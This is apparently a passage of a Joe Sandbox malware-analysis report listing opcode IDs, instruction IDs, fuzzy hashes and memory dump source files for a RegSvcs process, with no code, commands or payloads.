                                                            • API String ID:
                                                            • Opcode ID: 44784bcc4250eccd9ed5e965a61fe8dec3a3442063a5ce7b4f9aba864156fcc7
                                                            • Instruction ID: 2c8d7719b81131d415b129522a6d201f2d7a9e11dffb47a60d41258c314be5f9
                                                            • Opcode Fuzzy Hash: 44784bcc4250eccd9ed5e965a61fe8dec3a3442063a5ce7b4f9aba864156fcc7
                                                            • Instruction Fuzzy Hash: A74154B0C1020DDFEB10CF99C988B9EBFB0BF48300F20852AE505AB294DB706945CF91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 684191340561d57bed69cb158218faf83deb42965de3847ca0d2be71f2729bfa
                                                            • Instruction ID: 98fd2790990fd69ecb3ae54d38e2d6ce117a37b6f8f8b27e374b9ab4bb6c8087
                                                            • Opcode Fuzzy Hash: 684191340561d57bed69cb158218faf83deb42965de3847ca0d2be71f2729bfa
                                                            • Instruction Fuzzy Hash: 37318331E2121ADBEB16CF68C4457AEB7B2FF85310F108A29E541E7292D7B0BD41CB50
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4553a1fcb0751b9c0c75a41503a4bde13d0b9901cf206d6ecf5dd0d2c79c4940
                                                            • Instruction ID: 60ac3f9f8071f3e14473df11818bc16653a591bfe31ec7d65da43c950a3fcc2c
                                                            • Opcode Fuzzy Hash: 4553a1fcb0751b9c0c75a41503a4bde13d0b9901cf206d6ecf5dd0d2c79c4940
                                                            • Instruction Fuzzy Hash: 5C318F71B002068FDB15EB78D890AAEBBB5EF88300F508528D506E7355DB75ED05CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6a12afacecc7c9aaa1b65203fc22ad1056c1ef21ba3f6a53d344999fbc70cc2
                                                            • Instruction ID: 0d71f0da7173ead402e786a1783e23b46fa8e3edcb48ce234d02b4280cc83b8e
                                                            • Opcode Fuzzy Hash: b6a12afacecc7c9aaa1b65203fc22ad1056c1ef21ba3f6a53d344999fbc70cc2
                                                            • Instruction Fuzzy Hash: 1F314431E2121ADBDB16CF69C4557AEB7B2FF45300F208629E541F7292DB71AD41CB50
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cadfea80143e094ef23d19d08c956da92e6cdf5762ddd0ef99a4446608624d38
                                                            • Instruction ID: b7fa20931418065cefa73ec3d2be2a1e6cc396ca79a280fa8eef4e19a36eb0c2
                                                            • Opcode Fuzzy Hash: cadfea80143e094ef23d19d08c956da92e6cdf5762ddd0ef99a4446608624d38
                                                            • Instruction Fuzzy Hash: 8E41FEB0D00349DFEB14CFA9C984A9EBFB5FF48310F10812AE909AB254DB75A945CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfaa0dca6a146a38f9d679414e15c253c3e4c965eccfbbf8676163381e01c9f4
                                                            • Instruction ID: fc9978e48383f5588dbcbbe6cd80ea04b83e30e8b5788cc01a3a6f19480fb941
                                                            • Opcode Fuzzy Hash: dfaa0dca6a146a38f9d679414e15c253c3e4c965eccfbbf8676163381e01c9f4
                                                            • Instruction Fuzzy Hash: E741EFB0D00349DFDB14CFA9C984A9EBFF5FF48310F10812AE909AB254DB75A945CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8de9f3cf9a85ac856a9e0dd6cd73cd685cf9b6ae305bef8d803ec7a1a3553589
                                                            • Instruction ID: a925048b109a827514eb52360a12d3150ba3785b23b5fa6dea3835f4cf69c531
                                                            • Opcode Fuzzy Hash: 8de9f3cf9a85ac856a9e0dd6cd73cd685cf9b6ae305bef8d803ec7a1a3553589
                                                            • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                            • Instruction Fuzzy Hash: 5311E276504284CFDB0ACF54D5C4B55FF61FB84328F24C6A9DC494B656C33AD406CB52
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8d998e162a2a044b997e161538389ce95769ae97538dfe167d49e76c8a90827
                                                            • Instruction ID: afe6a2be0b106bacdb69268e4ec701d47bd88d7abb3ed13379a97bb5164741ff
                                                            • Opcode Fuzzy Hash: a8d998e162a2a044b997e161538389ce95769ae97538dfe167d49e76c8a90827
                                                            • Instruction Fuzzy Hash: 49018431E102168FDF22EFB884442AE7BF5EF58351F250579D505E7382EA31D841CB95
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d8184f7757e820c79c021397bb4d790828a6d10cf484c170ca6e93ea5628a83
                                                            • Instruction ID: 362dbfe4dcc0fb0e33246bc9a6ccda734c2339b9282849f3a47f75f1ea608a26
                                                            • Opcode Fuzzy Hash: 2d8184f7757e820c79c021397bb4d790828a6d10cf484c170ca6e93ea5628a83
                                                            • Instruction Fuzzy Hash: 8B1122B58046498FCB20DFAAD584BDEFFF4EF48320F24845AD659A7210D374A944CFA5
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25877a1f7c7835c82807b46b18a84a6144c6acda80c5ca98a9aa52cd47a91da4
                                                            • Instruction ID: df70697b7650b78a1ddf31d1786338c56650b2afa01ad211a2b16a9233b776c3
                                                            • Opcode Fuzzy Hash: 25877a1f7c7835c82807b46b18a84a6144c6acda80c5ca98a9aa52cd47a91da4
                                                            • Instruction Fuzzy Hash: 28018038224700CBD32C9B299D84636BFE9FF85760F94991DE41782600CBB0E811CB40
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ab328fa9df23ed2f0192083680de62e14fa1ce1e386ac63b828cb52cdb2e8b0
                                                            • Instruction ID: acc4ddcadc13e13607ad651231816ab34a8a764f81790b744b067087157915b4
                                                            • Opcode Fuzzy Hash: 9ab328fa9df23ed2f0192083680de62e14fa1ce1e386ac63b828cb52cdb2e8b0
                                                            • Instruction Fuzzy Hash: F601F935A102058BDB09DF68D94079EBF71FFC4310F94C269C9496F296EBB0AD05C790
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d63b667badaa3e60ca022682045e180d05d14eefe9fce8afd3d5f36cbca7adf
                                                            • Instruction ID: ff55e85984708e83cd1ccf228acdf490332828f3bb99d1677fde0f2ec8d6d05d
                                                            • Opcode Fuzzy Hash: 9d63b667badaa3e60ca022682045e180d05d14eefe9fce8afd3d5f36cbca7adf
                                                            • Instruction Fuzzy Hash: F7018F3090D3C19FCB239B7898104A5BFB4AF4B21070849EBE1C0CB263D3359A29C7A1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc01af061339cab4e77843301ba1099a6df003d93d8fe7f9b24dddccfe2cf61d
                                                            • Instruction ID: f0e7becabddfe0c9d8cd14ede6f3b55ba427b0331f9b00aa7573b6ee83650761
                                                            • Opcode Fuzzy Hash: fc01af061339cab4e77843301ba1099a6df003d93d8fe7f9b24dddccfe2cf61d
                                                            • Instruction Fuzzy Hash: E31100B58006498FDB20DF9AD584B9EFBF8EB48320F20841AD619A7200D378A944CFA5
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d20c0a58712bee748ed37b5275c009d1d7b7bb3557ed4e550b6754ac7a2c7808
                                                            • Instruction ID: 6be86817190e0d480d77ba5cd298d14164fca518e7187590b48bb27441594187
                                                            • Opcode Fuzzy Hash: d20c0a58712bee748ed37b5275c009d1d7b7bb3557ed4e550b6754ac7a2c7808
                                                            • Instruction Fuzzy Hash: 8F014B35B40204CFDB15DB74D498B6C37B2FF8A315F1009A8E5068B3A1CB30AD42CB41
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f931480098519cb5f389cb7f709d2198ea6a4198d0e0af23636d325b3a28fbc
                                                            • Instruction ID: f07cc91f2cf41c6b80953290fa4ebbe8baedd38514a0d8f61cb0c900b50c480e
                                                            • Opcode Fuzzy Hash: 3f931480098519cb5f389cb7f709d2198ea6a4198d0e0af23636d325b3a28fbc
                                                            • Instruction Fuzzy Hash: 3EF02B73A14111CFEB238BE8A4512BC7FB0EE65321B1902DBD602DB393D665D412D751
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 449238a4ae3fd310b506ce4aedb1be391b41151f0e6afed075ffdcdc3d3375e1
                                                            • Instruction ID: d39a0f4487835c9f3ff73fe0dc17e7c7e9918e89d68e5dd1ad8d303b551e6ddc
                                                            • Opcode Fuzzy Hash: 449238a4ae3fd310b506ce4aedb1be391b41151f0e6afed075ffdcdc3d3375e1
                                                            • Instruction Fuzzy Hash: AF01A2315152C6DBEB06FB78F94069D7F71EF81300F444AADC5115B296DE352E09C782
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e383bc633ef16f7a76d82496592d107f6176cd5a6ce00f2872fc873be89de0a5
                                                            • Instruction ID: 2ab70ad704f1d5af7397458fb8ab52bcb89eae3acc5d7c6643f549296513e637
                                                            • Opcode Fuzzy Hash: e383bc633ef16f7a76d82496592d107f6176cd5a6ce00f2872fc873be89de0a5
                                                            • Instruction Fuzzy Hash: DCF04F3591124ADFDB45FBB8FA8169DBBB1EF80300F50966CC504A7254EF712E188B81
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a94d9393fa37c214263f6bf51137505aa3daa8a3754a3d0ce7b3e4338763316
                                                            • Instruction ID: 963d6eb89973ed37f427e3b24f567b74e35adff258736b99d646d745c700b1e6
                                                            • Opcode Fuzzy Hash: 7a94d9393fa37c214263f6bf51137505aa3daa8a3754a3d0ce7b3e4338763316
                                                            • Instruction Fuzzy Hash: 3DF087B0D0424ADFCB58DFA8C401AAEBFF1AF08300F4188A9D584EB221D7308602CF90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21dbeec514ac4d036102add0f659c8d302294957a768d4ca6823c8def21cf242
                                                            • Instruction ID: a04331c16e1fbc3e032401f3f4bf6789cb6ed6961b329255f8e42db63d01a488
                                                            • Opcode Fuzzy Hash: 21dbeec514ac4d036102add0f659c8d302294957a768d4ca6823c8def21cf242
                                                            • Instruction Fuzzy Hash: 93F03AB0D1030EDFDB44DFA9C801AAEBBF5AB48300F4149A9D908E7200D77096008F90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acc8fbbe7bb93f3a5990339255ce0ed5e082b632d34301a7087930ad70f752f3
                                                            • Instruction ID: 2a24e77c8fe4abb71ad4ca4f870e62ea47aeed5d160b103c1a7cbd769a32683f
                                                            • Opcode Fuzzy Hash: acc8fbbe7bb93f3a5990339255ce0ed5e082b632d34301a7087930ad70f752f3
                                                            • Instruction Fuzzy Hash: 1FF03075E10714AF8B34CFA9D80049AFBF9EF48720B00856AE555D3600D771EA14CBD0
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62c22bf811fe02620dfd56beffe3f3829c42fc54ec7ef4ee8b08ef852437a6ef
                                                            • Instruction ID: efcb961774360564722684a535b8c6c1e55fffb842c146aff732eb18d0818841
                                                            • Opcode Fuzzy Hash: 62c22bf811fe02620dfd56beffe3f3829c42fc54ec7ef4ee8b08ef852437a6ef
                                                            • Instruction Fuzzy Hash: 8FF01CB0D14246DFC784DF78C54579ABFF0EF09304F2089A9C094DB221E7708602CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 863c4e32930de3bb0c6b4e07f2adbd7a9680c366f08d563163114f64a6ff4e72
                                                            • Instruction ID: 054e91c0acb68bb3ffd5c2ee348f044abd7e5b94b4a2fb2520cc5c8350b692cd
                                                            • Opcode Fuzzy Hash: 863c4e32930de3bb0c6b4e07f2adbd7a9680c366f08d563163114f64a6ff4e72
                                                            • Instruction Fuzzy Hash: 8CE08C320182899FCB42DFE4D890EA17FF9AF1B31034554E2E684CF022D221A465EB11
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db622fae8c5d361dbf74a5836e3eb19d954df7b5d3fed14e668c2374c77983f8
                                                            • Instruction ID: c91684688a78a05d543601b4f46a340cb54d3a874a18ccd92ae64ad00aced961
                                                            • Opcode Fuzzy Hash: db622fae8c5d361dbf74a5836e3eb19d954df7b5d3fed14e668c2374c77983f8
                                                            • Instruction Fuzzy Hash: 44D0A7B27591A62FC70222B858126E93B9E8B97614B4100E7D545CB193DA99CC4343EA
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e67e68a306e9ddd3d502689d6bf31c58525eddd81fdb72dcf2d526d481920931
                                                            • Instruction ID: e9f8e558aafe8617c70c74d30ce344fe929b254a5a1e5b269240574e2de1dc11
                                                            • Opcode Fuzzy Hash: e67e68a306e9ddd3d502689d6bf31c58525eddd81fdb72dcf2d526d481920931
                                                            • Instruction Fuzzy Hash: 4AE0B6B0D50209DFD740EFB9C905B5EBBF0BF08300F5189A9D019E7251E7B496048F91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f250fe8906cf6f8ea82814f7ef12499818290ffed1debf04653d1d02bdd1307
                                                            • Instruction ID: 4adee67ded4f2c4616f52afdff1878b4d4b813facb41b8321bd1371579c04b31
                                                            • Opcode Fuzzy Hash: 6f250fe8906cf6f8ea82814f7ef12499818290ffed1debf04653d1d02bdd1307
                                                            • Instruction Fuzzy Hash: 16B09B2171517613D904719D64109ED728E4785A65F400177A50E877455ED55D4102DD
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac348770829ecda40afa7c9ae510bdb9d61155d084565b876be1332f1f057251
                                                            • Instruction ID: a53b8d0b2d8a17e51209b30c3ea075f1fabd01409a4304764ee8ef37de627ac5
                                                            • Opcode Fuzzy Hash: ac348770829ecda40afa7c9ae510bdb9d61155d084565b876be1332f1f057251
                                                            • Instruction Fuzzy Hash: 1AD0C97086431ACFEF258FC5C82D7EEBB70FB08304F400419E011A6194CBB90949CF58